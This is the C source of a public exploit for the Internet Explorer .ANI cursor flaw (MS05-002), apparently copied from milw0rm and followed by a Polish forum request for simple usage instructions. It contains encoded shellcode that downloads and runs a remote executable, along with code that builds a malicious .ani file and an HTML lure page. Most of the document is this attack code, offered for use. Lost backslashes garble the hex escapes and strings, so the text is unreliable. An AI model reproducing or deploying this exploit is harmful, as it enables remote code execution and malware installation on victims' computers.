/* Modified by Vertygo aka Ivanm (
[email protected]) all credits goes to
houseofdabus Berend-Jan Wever and to milw0rm*/
/* Added string.h /str0ke */
/* HOD-ms05002-ani-expl.c: 2005-01-10: PUBLIC v.0.2
*
* Copyright Š 2004-2005 houseofdabus.
*
* (MS05-002) Microsoft Internet Explorer .ANI Files Handling Exploit
* (CAN-2004-1049)
*
*
*
* .::[ houseofdabus ]::.
*
*
*
* (universal -- for all affected systems)
* ---------------------------------------------------------------------
* Description:
* A remote code execution vulnerability exists in the way that
* cursor, animated cursor, and icon formats are handled. An attacker
* could try to exploit the vulnerability by constructing a malicious
* cursor or icon file that could potentially allow remote code
* execution if a user visited a malicious Web site or viewed a
* malicious e-mail message. An attacker who successfully exploited
* this vulnerability could take complete control of an affected
* system.
*
* ---------------------------------------------------------------------
* Patch:
*
http://www.microsoft.com/technet/security/...n/MS05-002.mspx
*
* ---------------------------------------------------------------------
* Tested on:
* - Windows Server 2003
* - Windows XP SP1
* - Windows XP SP0
* - Windows 2000 SP4
* - Windows 2000 SP3
* - Windows 2000 SP2
*
* ---------------------------------------------------------------------
* Compile:
*
* Win32/VC++ : cl -o HOD-ms05002-ani-expl HOD-ms05002-ani-expl.c
* Win32/cygwin: gcc -o HOD-ms05002-ani-expl HOD-ms05002-ani-expl.c
* Linux : gcc -o HOD-ms05002-ani-expl HOD-ms05002-ani-expl.c
*
* ---------------------------------------------------------------------
* Example:
*
* C:>HOD-ms05002-ani-expl.exe poc 7777
* <...>
* [*] Creating poc.ani file ... Ok
* [*] Creating poc.html file ... Ok
*
* C:>
*
* start IE -> C
oc.html
*
* C:>telnet localhost 7777
* Microsoft Windows 2000 [Version 5.00.2195]
* Š Copyright 1985-2000 Microsoft Corp.
*
* C
ocuments and SettingsAdministratorDesktop>
*
* ---------------------------------------------------------------------
*
* This is provided as proof-of-concept code only for educational
* purposes and testing by authorized individuals with permission to
* do so.
*
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
/* ANI header */
unsigned char aniheader[] =
"x52x49x46x46x9cx18x00x00x41x43x4fx4ex61x6ex69x68"
"x7cx03x00x00x24x00x00x00x08x00x00x00x08x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
/* jmp offset, no Jitsu */
"x77x82x40x00xebx64x90x90x77x82x40x00xebx64x90x90"
"xebx54x90x90x77x82x40x00xebx54x90x90x77x82x40x00"
"xebx44x90x90x77x82x40x00xebx44x90x90x77x82x40x00"
"xebx34x90x90x77x82x40x00xebx34x90x90x77x82x40x00"
"xebx24x90x90x77x82x40x00xebx24x90x90x77x82x40x00"
"xebx14x90x90x77x82x40x00xebx14x90x90x77x82x40x00"
"x77x82x40x00x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90";
/* portbind shellcode */
unsigned char shellcode[] =
"xEBx0Fx58x80x30x17x40x81x38x6Dx30x30x21x75xF4"
"xEBx05xE8xECxFFxFFxFFxFEx94x16x17x17x4Ax42x26"
"xCCx73x9Cx14x57x84x9Cx54xE8x57x62xEEx9Cx44x14"
"x71x26xC5x71xAFx17x07x71x96x2Dx5Ax4Dx63x10x3E"
"xD5xFExE5xE8xE8xE8x9ExC4x9Cx6Dx2Bx16xC0x14x48"
"x6Fx9Cx5Cx0Fx9Cx64x37x9Cx6Cx33x16xC1x16xC0xEB"
"xBAx16xC7x81x90xEAx46x26xDEx97xD6x18xE4xB1x65"
"x1Dx81x4Ex90xEAx63x05x50x50xF5xF1xA9x18x17x17"
"x17x3ExD9x3ExE0xFExFFxE8xE8xE8x26xD7x71x9Cx10"
"xD6xF7x15x9Cx64x0Bx16xC1x16xD1xBAx16xC7x9ExD1"
"x9ExC0x4Ax9Ax92xB7x17x17x17x57x97x2Fx16x62xED"
"xD1x17x17x9Ax92x0Bx17x17x17x47x40xE8xC1x7Fx13"
"x17x17x17x7Fx17x07x17x17x7Fx68x81x8Fx17x7Fx17"
"x17x17x17xE8xC7x9Ex92x9Ax17x17x17x9Ax92x18x17"
"x17x17x47x40xE8xC1x40x9Ax9Ax42x17x17x17x46xE8"
"xC7x9ExD0x9Ax92x4Ax17x17x17x47x40xE8xC1x26xDE"
"x46x46x46x46x46xE8xC7x9ExD4x9Ax92x7Cx17x17x17"
"x47x40xE8xC1x26xDEx46x46x46x46x9Ax82xB6x17x17"
"x17x45x44xE8xC7x9ExD4x9Ax92x6Bx17x17x17x47x40"
"xE8xC1x9Ax9Ax86x17x17x17x46x7Fx68x81x8Fx17xE8"
"xA2x9Ax17x17x17x44xE8xC7x48x9Ax92x3Ex17x17x17"
"x47x40xE8xC1x7Fx17x17x17x17x9Ax8Ax82x17x17x17"
"x44xE8xC7x9ExD4x9Ax92x26x17x17x17x47x40xE8xC1"
"xE8xA2x86x17x17x17xE8xA2x9Ax17x17x17x44xE8xC7"
"x9Ax92x2Ex17x17x17x47x40xE8xC1x44xE8xC7x9Ax92"
"x56x17x17x17x47x40xE8xC1x7Fx12x17x17x17x9Ax9A"
"x82x17x17x17x46xE8xC7x9Ax92x5Ex17x17x17x47x40"
"xE8xC1x7Fx17x17x17x17xE8xC7xFFx6FxE9xE8xE8x50"
"x72x63x47x65x78x74x56x73x73x65x72x64x64x17x5B"
"x78x76x73x5Bx7Ex75x65x76x65x6Ex56x17x41x7Ex65"
"x63x62x76x7Bx56x7Bx7Bx78x74x17x48x7Bx74x65x72"
"x76x63x17x48x7Bx60x65x7Ex63x72x17x48x7Bx74x7B"
"x78x64x72x17x40x7Ex79x52x6Fx72x74x17x52x6Fx7E"
"x63x47x65x78x74x72x64x64x17x40x7Ex79x5Ex79x72"
"x63x17x5Ex79x63x72x65x79x72x63x58x67x72x79x56"
"x17x5Ex79x63x72x65x79x72x63x58x67x72x79x42x65"
"x7Bx56x17x5Ex79x63x72x65x79x72x63x45x72x76x73"
"x51x7Ex7Bx72x17x17x17x17x17x17x17x17x17x7Ax27"
"x27x39x72x6Fx72x17"
"m00!";
//#define SET_PORTBIND_PORT(buf, port) *(unsigned short *)(((buf)+300)) = (port)
unsigned char discl[] =
"This is provided as proof-of-concept code only for educational"
" purposes and testing by authorized individuals with permission"
" to do so.";
unsigned char html[] =
"<html>n"
"(MS05-002) Microsoft Internet Explorer .ANI Files Handling Exploit"
"
Copyright Š 2004-2005 .: houseofdabus :.
<a href =""
"http://www.microsoft.com/technet/security/Bulletin/MS05-002.mspx">"
"Patch (MS05-002)</a>n"
"<script>alert("%s")</script>n<head>nt<style>n"
"tt* {CURSOR: url("%s.ani")}nt</style>n</head>n"
"</html>";
unsigned short
fixx(unsigned short p)
{
unsigned short r = 0;
r = (p & 0xFF00) >> 8;
r |= (p & 0x00FF) << 8;
return r;
}
void
usage(char *prog)
{
printf("Usage:n");
printf("%s <file> <url to file>nn", prog);
printf("eg: %s index
http://www.blic.net/proggy.exenn", prog);
exit(0);
}
int
main(int argc, char **argv)
{
FILE *fp;
unsigned short port;
unsigned char f[256+5] = "";
unsigned char anib[912] = "";
unsigned char newshellcode[686];
printf("n(MS05-002) Microsoft Internet Explorer .ANI Files Handling Exploitnn");
printf("tCopyright Š 2004-2005 .: houseofdabus :.nnn");
printf("tModified by Vertygo (
[email protected])nnn");
printf("%snn", discl);
if ( (sizeof(shellcode)-1) > (912-sizeof(aniheader)-3) ) {
printf("[-] Size of shellcode must be <= 686 bytesn");
return 0;
}
if (argc < 3) usage(argv[0]);
if (strlen(argv[1]) > 256) {
printf("[-] Size of filename must be <=256 bytesn");
return 0;
}
/* creating ani file */
strcpy(f, argv[1]);
strcat(f, ".ani");
printf("[*] Creating %s file ...", f);
fp = fopen(f, "wb");
if (fp == NULL) {
printf("n[-] error: can't create file: %sn", f);
return 0;
}
memset(newshellcode,0x90,sizeof(shellcode)+strlen(argv[2])+1);
strcpy(newshellcode,shellcode);
strcat(newshellcode,argv[2]);
strcat(newshellcode,"x01");
memset(anib, 0x90, 912);
memcpy(anib, aniheader, sizeof(aniheader)-1);
memcpy(anib+sizeof(aniheader)-1, newshellcode, sizeof(newshellcode)-1);
fwrite(anib, 1, 912, fp);
printf(" Okn");
fclose(fp);
f[0] = '0';
strcpy(f, argv[1]);
strcat(f, ".html");
printf("[*] Creating %s file ...", f);
fp = fopen(f, "wb");
if (fp == NULL) {
printf("n[-] error: can't create file: %sn", f);
return 0;
}
sprintf(anib, html, discl, argv[1]);
fwrite(anib, 1, strlen(anib), fp);
printf(" Okn");
fclose(fp);
return 0;
}
// milw0rm.com [2005-01-24]
Próbowałem coś z .ani file downloader itp ale nic nie działa z tego - aha i czy ktoś mógłby mi jakąś prostą instrukcje napisać?? bo jak wpisuje np.
